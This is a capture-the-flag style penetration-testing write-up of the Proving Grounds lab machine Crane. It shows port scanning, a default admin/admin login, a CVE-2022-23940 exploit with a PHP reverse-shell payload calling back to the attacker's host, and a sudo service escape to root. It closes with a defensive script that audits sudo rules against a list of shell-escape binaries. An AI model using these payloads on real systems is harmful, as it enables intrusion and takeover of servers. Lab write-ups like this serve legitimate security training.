As always in every penetration testing engagement, we start with reconnaissance and information gathering. In this step we try to get as much information about the target as possible.
We can achieve that by using various tools and techniques to obtain a foothold on the target: enumeration, scanning and other recon techniques.
In this lab we are tasked with pentesting the Linux machine Crane on Offsec's Proving Grounds:
The first step is to check if the target is up and running. We can do so by sending ICMP requests to check if we can communicate with the target:

Next I'll perform an initial scan with rustscan to see what ports are open:
rustscan -a 192.168.113.146 --ulimit 5000
From the initial scan I noticed there are 4 ports open:

Port 22 : SSH
Port 80 : HTTP
Port 3306 : mysql
Port 33060 : mysqlx
From the full scan I can see the following output:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 37:80:01:4a:43:86:30:c9:79:e7:fb:7f:3b:a4:1e:dd (RSA)
| 256 b6:18:a1:e1:98:fb:6c:c6:87:55:45:10:c6:d4:45:b9 (ECDSA)
|_ 256 ab:8f:2d:e8:a2:04:e7:b7:65:d3:fe:5e:93:1e:03:67 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/
|_http-favicon: Unknown favicon MD5: ED9A8C7810E8C9FB7035B6C3147C9A3A
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-title: SuiteCRM
|_Requested resource was index.php?action=Login&module=Users
3306/tcp open mysql MySQL (unauthorized)
33060/tcp open mysqlx MySQL X protocol listener
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Something that catches my attention on port 80 is SuiteCRM. It looks interesting, so I'll investigate the webpage on port 80 first and move to the other ports afterwards…
This is the page on port 80:

Two things to note and search for: SuiteCRM and SugarCRM, which are both hinted at on the webpage…
Apparently the website owner is lazy, because guess what? The user is admin and the password is admin…
By searching with searchsploit for SuiteCRM I found an exploit for the CRM, an authenticated RCE using Metasploit:
SuiteCRM 7.11.18 — Remote Code Execution (RCE) (Authenticated) (Metasploit)
The Metasploit exploit didn't work, so I tried another exploit for the CVE:
CVE-2022-23940
This vulnerability was reported to SalesAgility and fixed in SuiteCRM 7.12.5 and SuiteCRM Core 8.0.4. In affected versions, any user with permission to create Scheduled Reports can obtain remote code execution and compromise the server. If you are using older versions of SuiteCRM, I highly advise you to update.
PoC link: https://github.com/manuelz120/CVE-2022-23940.git
By running a listener:
nc -lnvp 4444
And afterwards running the exploit with the following command, I was able to get a shell:
└─# ./exploit.py -h http://192.168.113.146 -u admin -p admin --payload "php -r '\$sock=fsockopen(\"192.168.45.218\", 4444); exec(\"/bin/sh -i <&3 >&3 2>&3\");'"
Next we should escalate our privileges to root. I would run linpeas to enumerate possible PE vectors, but before I do that I'll run sudo -l.
By running sudo -l I can see the following output:
$ sudo -l
Matching Defaults entries for www-data on localhost:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on localhost:
(ALL) NOPASSWD: /usr/sbin/service
We can run something called service with NOPASSWD in sudo, so let's search what this is on GTFOBins.
By running the following command I can spawn a root shell:
$ sudo /usr/sbin/service ../../bin/sh

It was this simple…
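The sudo rule that ended this box is the kind of thing a hardening review should catch before an attacker does. As an added example (not part of the original writeup), this Python script parses `sudo -l` output such as the one shown above, flags rules that grant a shell-escape-capable binary with unrestricted arguments, and builds a replacement sudoers line that pins the arguments; the list of risky binaries and the "restart apache2" use case are assumptions for the demo.

```python
import os
import re

# Constructed sample input: the `sudo -l` output from the writeup, plus one extra
# hypothetical rule with fixed arguments so the contrast is visible.
SUDO_L_OUTPUT = """\
Matching Defaults entries for www-data on localhost:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin
User www-data may run the following commands on localhost:
    (ALL) NOPASSWD: /usr/sbin/service
    (root) /usr/bin/systemctl restart apache2
"""

# Binaries that hand over a root shell when sudo allows them with free arguments
# (an assumed subset of the GTFOBins "sudo" list). `service` is the one used in
# the writeup: it executes /etc/init.d/<name>, so ../../bin/sh escapes init.d.
SHELL_ESCAPE_BINS = {"service", "sh", "bash", "vim", "less", "find", "env", "awk", "python3"}

RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def audit_sudo_rules(sudo_l_text):
    """Return (runas, command, reason) for every rule that grants a shell escape."""
    findings = []
    in_rules = False
    for line in sudo_l_text.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True  # everything after this header is a rule line
            continue
        m = RULE_RE.match(line) if in_rules else None
        if not m:
            continue
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in m.group("cmds").split(", "):
            tokens = cmd.split()
            binary = os.path.basename(tokens[0])
            if binary in SHELL_ESCAPE_BINS and len(tokens) == 1:
                reason = "unrestricted arguments" + (", no password required" if nopasswd else "")
                findings.append((m.group("runas"), cmd, reason))
            elif cmd == "ALL":
                findings.append((m.group("runas"), cmd, "any command allowed"))
    return findings


def suggest_rule(user, runas, binary, fixed_args):
    """Build a sudoers line that pins the arguments, e.g. only restarting apache2."""
    return f"{user} ALL=({runas}) NOPASSWD: {binary} {' '.join(fixed_args)}"


if __name__ == "__main__":
    for runas, cmd, reason in audit_sudo_rules(SUDO_L_OUTPUT):
        print(f"RISK: ({runas}) {cmd}: {reason}")
    print(suggest_rule("www-data", "root", "/usr/sbin/service", ["apache2", "restart"]))
```

The systemctl rule with fixed arguments is not flagged, which is the shape the service rule should have had.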